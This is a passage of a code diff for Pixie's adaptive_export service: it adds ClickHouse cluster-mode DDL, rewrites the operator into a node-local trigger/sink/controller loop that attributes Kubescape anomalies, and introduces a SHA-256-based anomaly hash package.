CreateClickHouseSchemas final : public carnot::udf::UDTF("database", "ClickHouse database", "'default'"), UDTFArg::Make( - "use_if_not_exists", "Whether to use IF NOT EXISTS in CREATE TABLE statements", true)); + "use_if_not_exists", "Whether to use IF NOT EXISTS in CREATE TABLE statements", true), + UDTFArg::Make( + "cluster_name", + "ClickHouse cluster name for ON CLUSTER DDL and ReplicatedMergeTree engine. " + "Empty string disables cluster mode.", + "''")); } Status Init(FunctionContext*, types::StringValue host, types::Int64Value port, types::StringValue username, types::StringValue password, types::StringValue database, - types::BoolValue use_if_not_exists) { + types::BoolValue use_if_not_exists, types::StringValue cluster_name) { // Store ClickHouse connection parameters host_ = std::string(host); port_ = port.val; @@ -1158,6 +1163,7 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTFExecute(absl::Substitute("DROP TABLE IF EXISTS $0", table_name)); + std::string drop_cluster_clause = + cluster_name_.empty() ? 
"" : absl::Substitute(" ON CLUSTER '$0'", cluster_name_); + clickhouse_client_->Execute( + absl::Substitute("DROP TABLE IF EXISTS $0$1", table_name, drop_cluster_clause)); } // Create new table @@ -1276,7 +1286,8 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF column_defs; // Add columns from schema @@ -1301,14 +1312,21 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF= 22.x). + std::string engine = cluster_name.empty() ? "MergeTree()" : "ReplicatedMergeTree()"; std::string create_sql = absl::Substitute(R"( - CREATE TABLE $0$1 ( - $2 - ) ENGINE = MergeTree() + CREATE TABLE $0$1$2 ( + $3 + ) ENGINE = $4 PARTITION BY toYYYYMM(event_time) ORDER BY (hostname, event_time) )", - if_not_exists_clause, table_name, columns_str); + if_not_exists_clause, table_name, on_cluster_clause, + columns_str, engine); return create_sql; } @@ -1326,6 +1344,7 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF +// - start the trigger + controller +// +// 2. steady state: +// - trigger polls forensic_db.kubescape_logs WHERE hostname= +// - controller derives anomaly hash from each event and writes a +// forensic_db.adaptive_attribution row (one INSERT per event; +// ReplacingMergeTree(t_end) collapses re-inserts to the latest +// end_time, extending the active window) +// +// 3. shutdown: +// - on SIGINT/SIGTERM, cancel context, drain. package main import ( @@ -21,276 +42,445 @@ import ( "fmt" "os" "os/signal" + "strconv" + "strings" + "sync" "syscall" "time" log "github.com/sirupsen/logrus" - "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" "px.dev/pixie/src/vizier/services/adaptive_export/internal/config" + "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi" "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" ) const ( - defaultRetries = 100 - defaultSleepTime = 15 * time.Second - schemaCreationInterval = 2 * time.Minute - setupTimeout = 30 * time.Second - scriptExecutionTimeout = 60 * time.Second -) - -const ( - // TODO(ddelnano): Clickhouse configuration should come from plugin config. - schemaCreationScript = ` -import px -px.display(px.CreateClickHouseSchemas( - host="hyperdx-hdx-oss-v2-clickhouse.click.svc.cluster.local", - port=9000, - username="otelcollector", - password="otelcollectorpass", - database="default" -)) -` - detectionScript = ` -import px - -df = px.DataFrame('kubescape_logs', clickhouse_dsn='otelcollector:otelcollectorpass@hyperdx-hdx-oss-v2-clickhouse.click.svc.cluster.local:9000/default', start_time='-%ds') -df.alert = df.message -df.namespace = px.pluck(df.RuntimeK8sDetails, "podNamespace") -df.podName = px.pluck(df.RuntimeK8sDetails, "podName") -df.time_ = px.int64_to_time(df.event_time * 1000000000) -df = df[['time_', 'alert', 'namespace', 'podName']] -px.display(df) -` + // envCHHTTPEndpoint overrides the ClickHouse HTTP endpoint used by + // both the trigger (poll kubescape_logs) and the sink (write + // adaptive_attribution). Defaults to http://:8123. 
+ envCHHTTPEndpoint = "FORENSIC_CH_HTTP_ENDPOINT" + + // envNodeName is the k8s downward API var the DaemonSet sets via + // `valueFrom: fieldRef: spec.nodeName`. Falls back to os.Hostname(). + envNodeName = "NODE_NAME" + + // envWindowBeforeSec / envWindowAfterSec / envTriggerPollMS / + // envPruneIntervalSec are programmatic overrides per the spec. + envWindowBeforeSec = "ADAPTIVE_WINDOW_BEFORE_SEC" + envWindowAfterSec = "ADAPTIVE_WINDOW_AFTER_SEC" + envTriggerPollMS = "ADAPTIVE_TRIGGER_POLL_MS" + envPruneIntervalSec = "ADAPTIVE_PRUNE_INTERVAL_SEC" + + // envSkipApply lets a deployment opt out of in-process DDL when + // the schema has been pre-applied by a separate Job (recommended + // production split: high-priv Job for CREATE TABLE / ALTER, then + // the operator runs with INSERT-only creds and skips Apply). + // VerifyPixieSchema still runs and refuses to start on drift. + envSkipApply = "ADAPTIVE_SKIP_APPLY" + + // envInstallPresets makes the operator boot install Pixie's preset + // retention scripts on this cluster. One-shot, idempotent (script-name + // match → skip). Defaults to false because the production design has + // users author scripts in the Pixie UI. + envInstallPresets = "INSTALL_PRESET_SCRIPTS" + + // envPushPixieTables — when true, the operator queries vizier + // directly via pxapi on each fresh anomaly and writes the resulting + // rows to forensic_db. (rev-1 path). Required when the + // cloud's retention plugin can't reach the in-cluster CH (e.g. + // AOCC pixie cloud + CH ClusterIP service). + envPushPixieTables = "ADAPTIVE_PUSH_PIXIE_ROWS" ) func main() { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - log.Info("Starting the ClickHouse Adaptive Export service") + log.Info("starting adaptive-export operator (push flow, rev 2)") cfg, err := config.GetConfig() if err != nil { log.WithError(err).Fatal("failed to load configuration") } - clusterId := cfg.Pixie().ClusterID() - clusterName := cfg.Worker().ClusterName() - - // Setup Pixie Plugin API client - log.Infof("Setting up Pixie plugin API client for cluster-id %s", clusterId) - pluginClient, err := setupPixie(ctx, cfg.Pixie(), defaultRetries, defaultSleepTime) + hostname, err := resolveHostname() if err != nil { - log.WithError(err).Fatal("setting up Pixie plugin client failed") + log.WithError(err).Fatal("failed to resolve node identity — set NODE_NAME via k8s downward API (spec.nodeName)") } + log.WithField("hostname", hostname).Info("operator pod is node-local") + + chEndpoint := chHTTPEndpoint(cfg.ClickHouse().Host(), os.Getenv(envCHHTTPEndpoint)) + log.WithField("endpoint", chEndpoint).Info("clickhouse HTTP endpoint resolved") - // Setup Pixie pxapi client for executing PxL scripts - log.Info("Setting up Pixie pxapi client") - // Use parent context - client stores this and uses it for all subsequent operations - pxClient, err := pxapi.NewClient(ctx, pxapi.WithAPIKey(cfg.Pixie().APIKey()), pxapi.WithCloudAddr(cfg.Pixie().Host())) + // 1. Apply operator-owned DDL FIRST, before Pixie's retention plugin + // has a chance to auto-create pixie tables with its minimal + // column set (no namespace / pod). The kubescape tables + // (alerts, kubescape_logs) are owned by the soc installer and + // are NOT touched here. 
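The internal/clickhouse Applier invoked below is not part of this diff. For orientation, here is a hedged sketch of the minimal transport it needs: ClickHouse's HTTP interface (the :8123 endpoint resolved above) executes a POSTed statement, with X-ClickHouse-User / X-ClickHouse-Key as its standard auth headers. The Applier's real API surface is an assumption; the operator code resumes right after with the actual NewApplier call.

```go
package clickhouseddl // illustrative stand-in; the real applier lives in internal/clickhouse

import (
	"context"
	"fmt"
	"io"
	"net/http"
	"strings"
)

// applyDDL executes one DDL statement via ClickHouse's HTTP interface.
// The request body is the statement itself; a non-200 status carries the
// server's error text in the response body.
func applyDDL(ctx context.Context, endpoint, user, password, ddl string) error {
	req, err := http.NewRequestWithContext(ctx, http.MethodPost, endpoint, strings.NewReader(ddl))
	if err != nil {
		return err
	}
	req.Header.Set("X-ClickHouse-User", user)
	req.Header.Set("X-ClickHouse-Key", password)
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
		return fmt.Errorf("clickhouse DDL failed: %s: %s", resp.Status, msg)
	}
	return nil
}
```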
+ applier, err := clickhouse.NewApplier(chEndpoint, cfg.ClickHouse().User(), cfg.ClickHouse().Password()) if err != nil { - log.WithError(err).Fatal("failed to create pxapi client") + log.WithError(err).Fatal("failed to construct schema applier") + } + if strings.EqualFold(os.Getenv(envSkipApply), "true") { + log.Info("ADAPTIVE_SKIP_APPLY=true — schema apply skipped; expecting an out-of-band DDL Job to have created the tables") + } else { + if err := applier.Apply(ctx); err != nil { + log.WithError(err).Fatal("schema apply failed; refusing to proceed with possibly drifted tables") + } + log.WithField("tables", clickhouse.OperatorOwnedTables).Info("operator-owned DDL applied") } - // Start schema creation background task - go runSchemaCreationTask(ctx, pxClient, clusterId) - - // Start detection script that monitors for when to enable persistence - go runDetectionTask(ctx, pxClient, pluginClient, cfg, clusterId, clusterName) - - // Wait for signal to shutdown - sigCh := make(chan os.Signal, 1) - signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) - <-sigCh - - log.Info("Shutting down adaptive export service") - cancel() - time.Sleep(1 * time.Second) -} - -func runSchemaCreationTask(ctx context.Context, client *pxapi.Client, clusterID string) { - ticker := time.NewTicker(schemaCreationInterval) - defer ticker.Stop() + // 2. Defensive guard against Pixie's retention plugin having + // auto-created any pixie table BEFORE our Apply ran (e.g. a + // pre-existing cluster install). Refuse to start if drift + // detected so the misconfig is loud, not silent. + if err := applier.VerifyPixieSchema(ctx); err != nil { + log.WithError(err).Fatal("pixie table schema drift detected — pre-existing tables are missing operator-required columns; drop and re-create OR ALTER TABLE ADD COLUMN before retrying") + } + log.Info("pixie table schemas verified — namespace + pod columns present on all 12 tables") - // Run immediately on startup - log.Info("Running schema creation script") - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - if _, err := pxl.ExecuteScript(execCtx, client, clusterID, schemaCreationScript); err != nil { - log.WithError(err).Error("failed to execute schema creation script") + // 3. Ensure the Pixie ClickHouse retention plugin is enabled. The + // retention scripts themselves are defined by the user via the + // Pixie UI — we don't manage them. + pluginClient, err := pixie.NewClient(ctx, cfg.Pixie().APIKey(), cfg.Pixie().Host()) + if err != nil { + log.WithError(err).Fatal("failed to create pixie plugin client") + } + chDSN := cfg.ClickHouse().DSN() + exportURL, err := pluginClient.EnsureClickHousePluginEnabled(chDSN) + if err != nil { + // non-fatal — the operator's own write path doesn't depend on + // the plugin; analyst joins against pixie-table rows do, but a + // missing plugin is a deployment misconfiguration the user + // surfaces via UI. 
+ log.WithError(err).Warn("could not ensure ClickHouse plugin is enabled — pixie tables will not be populated until you turn it on in the Pixie UI") } else { - log.Info("Schema creation script completed successfully") + log.WithField("export_url", exportURL).Info("clickhouse retention plugin is enabled") } - cancel() - for { - select { - case <-ctx.Done(): - log.Info("Schema creation task shutting down") - return - case <-ticker.C: - log.Info("Running schema creation script") - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - if _, err := pxl.ExecuteScript(execCtx, client, clusterID, schemaCreationScript); err != nil { - log.WithError(err).Error("failed to execute schema creation script") - } else { - log.Info("Schema creation script completed successfully") - } - cancel() + // 3b. (optional) install Pixie's preset retention scripts so the + // pixie observation tables actually receive rows. Without this, + // the plugin is enabled but does nothing. + if strings.EqualFold(os.Getenv(envInstallPresets), "true") { + installed, err := installPresetScripts(pluginClient, cfg.Pixie().ClusterID(), cfg.Worker().ClusterName()) + if err != nil { + log.WithError(err).Warn("INSTALL_PRESET_SCRIPTS=true but install failed — pixie tables will stay empty") + } else { + log.WithField("installed", installed).Info("preset retention scripts installed on cluster") } } -} - -func runDetectionTask(ctx context.Context, pxClient *pxapi.Client, pluginClient *pixie.Client, cfg config.Config, clusterID string, clusterName string) { - detectionInterval := time.Duration(cfg.Worker().DetectionInterval()) * time.Second - detectionLookback := cfg.Worker().DetectionLookback() - - ticker := time.NewTicker(detectionInterval) - defer ticker.Stop() - pluginEnabled := false + // 4. Build trigger + sink + controller. + pollInterval := durEnv(envTriggerPollMS, 250*time.Millisecond, time.Millisecond) + trg, err := trigger.New(trigger.Config{ + Endpoint: chEndpoint, + Database: cfg.ClickHouse().Database(), + Table: cfg.ClickHouse().Table(), + Username: cfg.ClickHouse().User(), + Password: cfg.ClickHouse().Password(), + Hostname: hostname, + PollInterval: pollInterval, + }) + if err != nil { + log.WithError(err).Fatal("failed to create trigger") + } - for { - select { - case <-ctx.Done(): - log.Info("Detection task shutting down") - return - case <-ticker.C: - log.Info("Running detection script") - // Run detection script with lookback period - detectionPxl := fmt.Sprintf(detectionScript, detectionLookback) - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - recordCount, err := pxl.ExecuteScript(execCtx, pxClient, clusterID, detectionPxl) - cancel() + snk, err := sink.New(sink.Config{ + Endpoint: chEndpoint, + Database: cfg.ClickHouse().Database(), + Username: cfg.ClickHouse().User(), + Password: cfg.ClickHouse().Password(), + }) + if err != nil { + log.WithError(err).Fatal("failed to create sink") + } - if err != nil { - log.WithError(err).Error("failed to execute detection script") + ctlCfg := controller.Config{ + Hostname: hostname, + Before: durEnv(envWindowBeforeSec, 5*time.Minute, time.Second), + After: durEnv(envWindowAfterSec, 5*time.Minute, time.Second), + } + if strings.EqualFold(os.Getenv(envPushPixieTables), "true") { + // PxL's px.DataFrame(table=…) rejects dotted table names even + // though px.GetSchemas() lists them. Drop them from the push + // list; the cloud-side retention plugin would have to handle + // those if the user wants them. 
+ var tables []string + for _, t := range pxl.Names(pxl.BuiltinTables) { + if strings.Contains(t, ".") { + log.WithField("table", t).Info("skipping dotted-name table from push list — PxL DataFrame rejects it") continue } - - log.Debugf("Detection script returned %d records", recordCount) - - // If we have records and plugin is not enabled, enable it - if recordCount > 0 && !pluginEnabled { - log.Info("Detection script returned records - enabling forensic export") - pluginCtx, pluginCancel := context.WithTimeout(ctx, 2*time.Minute) - if err := enableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil { - log.WithError(err).Error("failed to enable forensic export") - } else { - pluginEnabled = true - log.Info("Forensic export enabled successfully") - } - pluginCancel() - } else if recordCount > 0 && pluginEnabled { - log.Info("Detection script returned records but forensic export already enabled, no action taken") + tables = append(tables, t) + } + ctlCfg.PushPixieTables = tables + log.WithField("tables", ctlCfg.PushPixieTables). + Info("ADAPTIVE_PUSH_PIXIE_ROWS=true — operator will query pixie + write rows directly on each anomaly") + } + ctl := controller.New(trg, snk, ctlCfg, nil) + if len(ctlCfg.PushPixieTables) > 0 { + var adapter *pixieapi.Adapter + if direct := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR"); direct != "" { + // Direct mode — bypass the cloud's passthrough proxy and + // connect to the in-cluster vizier-query-broker. Use this + // on self-hosted clouds where pxapi.WithAPIKey isn't + // authorized for the cluster (e.g. a freshly-deployed + // vizier whose ID isn't yet linked to the API key's owner). + a, err := pixieapi.NewDirectFromEnv(cfg.Pixie().ClusterID()) + if err != nil { + log.WithError(err).Fatal("ADAPTIVE_VIZIER_DIRECT_ADDR set but direct-mode adapter init failed") } + log.WithField("addr", direct).Info("pixieapi: direct mode (bypassing cloud proxy)") + adapter = a + } else { + pxClient, err := pxapi.NewClient(ctx, + pxapi.WithAPIKey(cfg.Pixie().APIKey()), + pxapi.WithCloudAddr(cfg.Pixie().Host())) + if err != nil { + log.WithError(err).Fatal("ADAPTIVE_PUSH_PIXIE_ROWS=true but failed to create pxapi client") + } + adapter = pixieapi.New(pxClient, cfg.Pixie().ClusterID()) } + ctl = ctl.WithPixieQuerier(&pixieAdapter{a: adapter}) } -} -func enableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error { - log.Info("Checking the current ClickHouse plugin configuration") - plugin, err := client.GetClickHousePlugin() - if err != nil { - return fmt.Errorf("getting data retention plugins failed: %w", err) + // 5. Rehydrate active state across crashes. + if err := ctl.Rehydrate(ctx); err != nil { + log.WithError(err).Warn("could not rehydrate active set; starting cold") + } else { + log.WithField("active", ctl.Active()).Info("active set rehydrated") } - enablePlugin := true - if plugin.RetentionEnabled { - enablePlugin = false - config, err := client.GetClickHousePluginConfig() - if err != nil { - return fmt.Errorf("getting ClickHouse plugin config failed: %w", err) + // 6. Periodic prune of in-memory expired entries + main controller loop. + // Both goroutines are tracked in a WaitGroup so SIGTERM cleanly waits + // for in-flight HTTP calls (trigger 5s timeout, sink 30s timeout) + // instead of being cut off by an arbitrary 500ms sleep. 
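internal/trigger is likewise outside this diff; the header comment pins down its contract (node-scoped, incremental polling of kubescape_logs). A sketch of that poll-loop shape under those assumptions — `event` and `fetchSince` are hypothetical stand-ins for the real row type and ClickHouse query; the operator's prune/run wiring continues below.

```go
package trigger // illustrative only; not the real internal/trigger

import (
	"context"
	"time"
)

// event stands in for whatever row the real trigger decodes from
// forensic_db.kubescape_logs.
type event struct {
	Hostname  string
	EventTime time.Time
	Message   string
}

// pollLoop fetches only events newer than the last one seen, scoped to this
// node's hostname so each DaemonSet pod handles its own rows.
func pollLoop(
	ctx context.Context,
	hostname string,
	interval time.Duration,
	fetchSince func(ctx context.Context, host string, since time.Time) ([]event, time.Time, error),
	handle func(event),
) error {
	cursor := time.Now().Add(-interval)
	t := time.NewTicker(interval)
	defer t.Stop()
	for {
		select {
		case <-ctx.Done():
			return ctx.Err()
		case <-t.C:
			evs, next, err := fetchSince(ctx, hostname, cursor)
			if err != nil {
				continue // transient CH errors: retry on the next tick
			}
			cursor = next
			for _, e := range evs {
				handle(e)
			}
		}
	}
}
```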
+ pruneInterval := durEnv(envPruneIntervalSec, 30*time.Second, time.Second) + var wg sync.WaitGroup + wg.Add(1) + go func() { + defer wg.Done() + t := time.NewTicker(pruneInterval) + defer t.Stop() + for { + select { + case <-ctx.Done(): + return + case <-t.C: + if removed := ctl.PruneExpired(); removed > 0 { + log.WithField("removed", removed).Debug("pruned expired active entries") + } + } } - if config.ExportUrl != cfg.ClickHouse().DSN() { - log.Info("ClickHouse plugin is configured with different DSN... Overwriting") - enablePlugin = true + }() + + // 7. Run the controller. + wg.Add(1) + go func() { + defer wg.Done() + if err := ctl.Run(ctx); err != nil && err != context.Canceled { + log.WithError(err).Error("controller exited with error") } + }() + + log.WithFields(log.Fields{ + "hostname": hostname, + "poll_interval": pollInterval, + "prune_interval": pruneInterval, + "window_before": ctlCfg.Before, + "window_after": ctlCfg.After, + }).Info("operator running") + + sigCh := make(chan os.Signal, 1) + signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) + <-sigCh + log.Info("shutdown signal received; waiting for goroutines to drain") + cancel() + // Bound the wait so a hung HTTP call can't keep the process up forever. + done := make(chan struct{}) + go func() { wg.Wait(); close(done) }() + select { + case <-done: + log.Info("clean shutdown") + case <-time.After(35 * time.Second): + log.Warn("shutdown deadline reached with goroutines still running; exiting") } +} - if enablePlugin { - log.Info("Enabling ClickHouse plugin") - err := client.EnableClickHousePlugin(&pixie.ClickHousePluginConfig{ - ExportUrl: cfg.ClickHouse().DSN(), - }, plugin.LatestVersion) - if err != nil { - return fmt.Errorf("failed to enable ClickHouse plugin: %w", err) - } +// chHTTPEndpoint resolves the ClickHouse HTTP endpoint. Explicit env +// override wins; otherwise build "http://<host>:8123" from config. +func chHTTPEndpoint(host, override string) string { + if override != "" { + return strings.TrimRight(override, "/") + } + if host == "" { + host = "localhost" } + return "http://" + host + ":8123" +} - log.Info("Setting up the data retention scripts") +// resolveHostname picks the node identity for node-local scoping. +// REQUIRES NODE_NAME (set via k8s downward API spec.nodeName). The +// previous os.Hostname() fallback returned the POD hostname, not the +// node — making the operator silently miss its node's rows. +func resolveHostname() (string, error) { + if v := strings.TrimSpace(os.Getenv(envNodeName)); v != "" { + return v, nil + } + return "", fmt.Errorf("%s env var is required (set via k8s downward API: valueFrom.fieldRef.fieldPath=spec.nodeName)", envNodeName) +} - log.Info("Getting preset script from the Pixie plugin") - defsFromPixie, err := client.GetPresetScripts() +// durEnv reads a positive-integer-valued duration env var. unit +// defines the unit (time.Second, time.Millisecond). Returns dflt on +// missing / unparseable / non-positive values — non-positive would +// either panic time.NewTicker or invert the attribution window, so +// we fall back to the default and log loudly. +func durEnv(key string, dflt, unit time.Duration) time.Duration { + v := strings.TrimSpace(os.Getenv(key)) + if v == "" { + return dflt + } + n, err := strconv.ParseInt(v, 10, 64) if err != nil { - return fmt.Errorf("failed to get preset scripts: %w", err) + log.WithError(err).WithFields(log.Fields{"key": key, "value": v}).
+ Warn("invalid duration env; using default") + return dflt } + if n <= 0 { + log.WithFields(log.Fields{"key": key, "value": v}). + Warn("non-positive duration env; using default") + return dflt + } + return time.Duration(n) * unit +} - definitions := defsFromPixie +// pixieAdapter wraps pixieapi.Adapter so its return type matches the +// controller's PixieQuerier interface (which uses []map[string]any +// rather than the pixieapi-internal Row alias). +type pixieAdapter struct{ a *pixieapi.Adapter } - log.Infof("Getting current scripts for cluster") - currentScripts, err := client.GetClusterScripts(clusterID, clusterName) +func (p *pixieAdapter) Query(ctx context.Context, src string) ([]map[string]any, error) { + rows, err := p.a.Query(ctx, src) if err != nil { - return fmt.Errorf("failed to get data retention scripts: %w", err) + return nil, err } - - actions := script.GetActions(definitions, currentScripts, script.ScriptConfig{ - ClusterName: clusterName, - ClusterId: clusterID, - CollectInterval: cfg.Worker().CollectInterval(), - }) - - var errs []error - - for _, s := range actions.ToDelete { - log.Infof("Deleting script %s", s.Name) - err := client.DeleteDataRetentionScript(s.ScriptId) - if err != nil { - errs = append(errs, err) - } + out := make([]map[string]any, len(rows)) + for i, r := range rows { + out[i] = map[string]any(r) } + return out, nil +} - for _, s := range actions.ToUpdate { - log.Infof("Updating script %s", s.Name) - err := client.UpdateDataRetentionScript(clusterID, s.ScriptId, s.Name, s.Description, s.FrequencyS, s.Script) - if err != nil { - errs = append(errs, err) +// installPresetScripts purges any stale ClickHouse-plugin retention +// scripts on the cluster, then installs the operator's built-in PxL +// scripts targeting the ten non-dotted socket_tracer tables we DDL'd +// (builtinPresetScripts explains why the dotted pair is skipped). +// Cloud-side "presets" are deliberately ignored: in this fork they +// target legacy tables (conn_stats, stack_traces, dc_snoop) that +// aren't in the rev-2 schema, so installing them would just silently +// fail to write. +func installPresetScripts(client *pixie.Client, clusterID, clusterName string) (int, error) { + current, err := client.GetClusterScripts(clusterID, clusterName) + if err != nil { + return 0, fmt.Errorf("get cluster scripts: %w", err) + } + currentNames := make([]string, 0, len(current)) + for _, s := range current { + currentNames = append(currentNames, s.Name) + } + log.WithFields(log.Fields{ + "already_on_cluster": len(current), + "cluster_script_names": currentNames, + }).Info("preset script install — purging managed + installing built-ins") + + // Purge ONLY scripts we recognise as operator-managed or as legacy + // presets we know are broken in the rev-2 schema. User-authored + // retention scripts are left alone. + for _, s := range current { + if !isOperatorManagedScript(s.Name) { + log.WithField("script", s.Name). + Debug("preset install — leaving user-authored script alone") + continue + } + if err := client.DeleteDataRetentionScript(s.ScriptId); err != nil { + log.WithError(err).WithField("script", s.Name).Warn("failed to delete stale script") + continue } + log.WithField("script", s.Name).Info("purged stale retention script") } - for _, s := range actions.ToCreate { - log.Infof("Creating script %s", s.Name) - err := client.AddDataRetentionScript(clusterID, s.Name, s.Description, s.FrequencyS, s.Script) - if err != nil { - errs = append(errs, err) + // Install built-ins.
+ presets := builtinPresetScripts() + installed := 0 + for _, p := range presets { + if err := client.AddDataRetentionScript(clusterID, p.Name, p.Description, p.FrequencyS, p.Script); err != nil { + log.WithError(err).WithField("script", p.Name).Warn("failed to install built-in script") + continue } + installed++ + log.WithField("script", p.Name).Info("installed retention script") } + return installed, nil +} - if len(errs) > 0 { - return fmt.Errorf("errors while setting up data retention scripts: %v", errs) +// isOperatorManagedScript decides whether a cluster-side retention +// script is safe to delete during INSTALL_PRESET_SCRIPTS. The criteria: +// +// 1. Anything with the "ch-" prefix matches the operator's own +// builtinPresetScripts naming (ch-<table>
) — managed. +// 2. The legacy AOCC presets we explicitly want to retire because +// their target tables don't exist in the rev-2 schema: +// "conn_stats export", "dc snoop export", "stack_traces export". +// +// Any other script is assumed user-authored and left alone. +func isOperatorManagedScript(name string) bool { + if strings.HasPrefix(name, "ch-") { + return true } - - log.Info("All done! The ClickHouse plugin is now configured.") - return nil + switch name { + case "conn_stats export", "dc snoop export", "stack_traces export": + return true + } + return false } -func setupPixie(ctx context.Context, cfg config.Pixie, tries int, sleepTime time.Duration) (*pixie.Client, error) { - apiKey := cfg.APIKey() - host := cfg.Host() - log.Infof("setupPixie: API Key length=%d, Host=%s", len(apiKey), host) - - for tries > 0 { - // Use parent context - client stores this and uses it for all subsequent operations - client, err := pixie.NewClient(ctx, apiKey, host) - if err == nil { - return client, nil - } - tries -= 1 - log.WithError(err).Warning("error creating Pixie API client") - if tries > 0 { - time.Sleep(sleepTime) - } +// builtinPresetScripts returns a minimum set of PxL scripts mirroring +// the canonical Pixie preset shape — one bulk-write script per +// socket_tracer table. Each adds namespace + pod columns and emits to +// the matching CH table via px.display(name='
<table>') which the +// retention plugin maps to forensic_db.<table>
. +// +// Schedule: 10s. Window: -15s (overlap so we don't lose rows during +// schedule jitter). +func builtinPresetScripts() []*script.ScriptDefinition { + // Drop dotted-name tables (http2_messages.beta, kafka_events.beta): + // `px.DataFrame(table='…')` rejects them at PxL compile time, so a + // preset for them would be permanently broken. The cloud-side + // retention plugin would have to handle those if needed. + tables := []string{ + "http_events", "dns_events", "redis_events", "mysql_events", + "pgsql_events", "cql_events", "mongodb_events", "amqp_events", + "mux_events", "tls_events", + } + out := make([]*script.ScriptDefinition, 0, len(tables)) + for _, t := range tables { + body := "import px\n" + + "df = px.DataFrame(table='" + t + "', start_time='-15s')\n" + + "df.namespace = px.upid_to_namespace(df.upid)\n" + + "df.pod = px.upid_to_pod_name(df.upid)\n" + + "px.display(df, '" + t + "')\n" + out = append(out, &script.ScriptDefinition{ + Name: "ch-" + t, + Description: "adaptive_export builtin preset for " + t, + FrequencyS: 10, + Script: body, + IsPreset: false, + }) } - return nil, fmt.Errorf("exceeded maximum number of retries") + return out } diff --git a/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel new file mode 100644 index 00000000000..01aaa0b3abf --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel @@ -0,0 +1,31 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "anomaly", + srcs = ["hash.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "anomaly_test", + srcs = ["hash_test.go"], + embed = [":anomaly"], +) diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash.go b/src/vizier/services/adaptive_export/internal/anomaly/hash.go new file mode 100644 index 00000000000..bb819cfefe7 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash.go @@ -0,0 +1,69 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +// Package anomaly defines the source-agnostic identity of one anomaly +// observation: a four-field Target and the deterministic AnomalyHash +// derived from it. +// +// AnomalyHash is the join key written by the operator into +// forensic_db.adaptive_attribution and joined against pixie observation +// tables on (hostname, namespace, pod, time_). +// +// The hash is workload-identity, NOT event-identity: it carries no +// timestamp and no rule id. The same workload firing N anomalies +// produces N kubescape rows, all collapsing to the same hash. This +// makes the hash a meaningful partition / join key. +package anomaly + +import ( + "crypto/sha256" + "encoding/hex" + "strconv" +) + +// AnomalyHash is the 32-hex-character (16-byte) join key derived from +// a Target. Same Target → same AnomalyHash, every time. +type AnomalyHash string + +// Target is the workload-identity used for hashing. Pod and Namespace +// MAY be empty (host-pid processes outside any pod). PID + Comm are +// always required by the producer; the hash function does not enforce +// that — extraction is the place to enforce. +// +// Note: timestamp and rule id deliberately not in the hash. Different +// rule firings on the same workload share the same hash; the time +// dimension is carried separately in the attribution row's +// (t_start, t_end) interval. +type Target struct { + PID uint64 + Comm string + Pod string // may be empty + Namespace string // may be empty +} + +// Hash returns the deterministic 32-hex-character AnomalyHash for the +// given Target. SHA-256 of the canonical form +// "<pid>:<comm>:<pod>:<namespace>", truncated to the leading 16 bytes +// (32 hex chars). 128 collision bits suffice for the workload +// cardinality envelope. +func Hash(t Target) AnomalyHash { + canonical := strconv.FormatUint(t.PID, 10) + ":" + + t.Comm + ":" + + t.Pod + ":" + + t.Namespace + sum := sha256.Sum256([]byte(canonical)) + return AnomalyHash(hex.EncodeToString(sum[:16])) +} diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go 